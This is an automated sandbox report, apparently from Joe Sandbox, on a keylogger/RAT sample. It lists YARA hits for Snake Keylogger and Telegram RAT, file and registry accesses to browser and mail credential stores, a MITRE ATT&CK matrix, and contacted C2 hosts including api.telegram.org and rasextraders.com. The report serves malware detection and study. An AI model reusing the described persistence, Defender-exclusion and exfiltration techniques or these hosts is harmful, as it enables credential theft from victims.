                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Users\user\AppData\Roaming\zDAKFK.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Users\user\AppData\Roaming\zDAKFK.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.19.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.19.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7556, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7556, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7556, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job                		111
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job                		3
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS121
                Security Software Discovery                		Distributed Component Object ModelInput Capture1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Process Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials41
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture13
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                Virtualization/Sandbox Evasion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550765 Sample: SecuriteInfo.com.Win32.RATX... Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 48 reallyfreegeoip.org 2->48 50 api.telegram.org 2->50 52 4 other IPs or domains 2->52 62 Malicious sample detected (through community Yara rule) 2->62 64 Sigma detected: Scheduled temp file as task from temp location 2->64 66 Multi AV Scanner detection for submitted file 2->66 72 9 other signatures 2->72 8 SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe 7 2->8         started        12 zDAKFK.exe 5 2->12         started        signatures3 68 Tries to detect the country of the analysis system (by using the IP) 48->68 70 Uses the Telegram API (likely for C&C communication) 50->70 process4 file5 40 C:\Users\user\AppData\Roaming\zDAKFK.exe, PE32 8->40 dropped 42 C:\Users\user\...\zDAKFK.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmpBE43.tmp, XML 8->44 dropped 46 SecuriteInfo.com.W....3030.23832.exe.log, ASCII 8->46 dropped 74 Uses schtasks.exe or at.exe to add and modify task schedules 8->74 76 Adds a directory exclusion to Windows Defender 8->76 78 Injects a PE file into a foreign processes 8->78 14 powershell.exe 23 8->14         started        17 powershell.exe 23 8->17         started        19 SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe 15 2 8->19         started        26 4 other processes 8->26 80 Multi AV Scanner detection for dropped file 12->80 82 Machine Learning detection for dropped file 12->82 22 zDAKFK.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 84 Loading BitLocker PowerShell Module 14->84 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        32 conhost.exe 17->32         started        54 checkip.dyndns.com 193.122.130.0, 49733, 49736, 49765 ORACLE-BMC-31898US United States 19->54 34 WerFault.exe 19->34         started        56 api.telegram.org 149.154.167.220, 443, 49779, 49780 TELEGRAMRU United Kingdom 22->56 58 rasextraders.com 205.147.111.116, 2525, 49783 NETMAGIC-APNetmagicDatacenterMumbaiIN India 22->58 60 reallyfreegeoip.org 188.114.97.3, 443, 49755, 49757 CLOUDFLARENETUS European Union 22->60 86 Tries to steal Mail credentials (via file / registry access) 22->86 88 Tries to harvest and steal browser information (history, passwords, etc) 22->88 36 conhost.exe 24->36         started        38 conhost.exe 26->38         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe21%ReversingLabsWin32.Trojan.Generic
                SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe22%VirustotalBrowse
                SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\zDAKFK.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\zDAKFK.exe21%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Roaming\zDAKFK.exe22%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                rasextraders.com0%VirustotalBrowse
                mail.rasextraders.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.sakkal.comR:0%Avira URL Cloudsafe
                http://rasextraders.com0%Avira URL Cloudsafe
                http://mail.rasextraders.com0%Avira URL Cloudsafe
                http://mail.rasextraders.com0%VirustotalBrowse
                http://rasextraders.com0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                rasextraders.com
                		205.147.111.116
                		truefalseunknown
                reallyfreegeoip.org
                		188.114.97.3
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		193.122.130.0
                    		truefalse
                      		high
                      mail.rasextraders.com
                      		unknown
                      		unknowntrueunknown
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          		high
                          https://reallyfreegeoip.org/xml/173.254.250.79false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.orgzDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/botSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.office.com/lBzDAKFK.exe, 00000010.00000002.4132563697.0000000002A73000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.tiro.comSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designersSecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
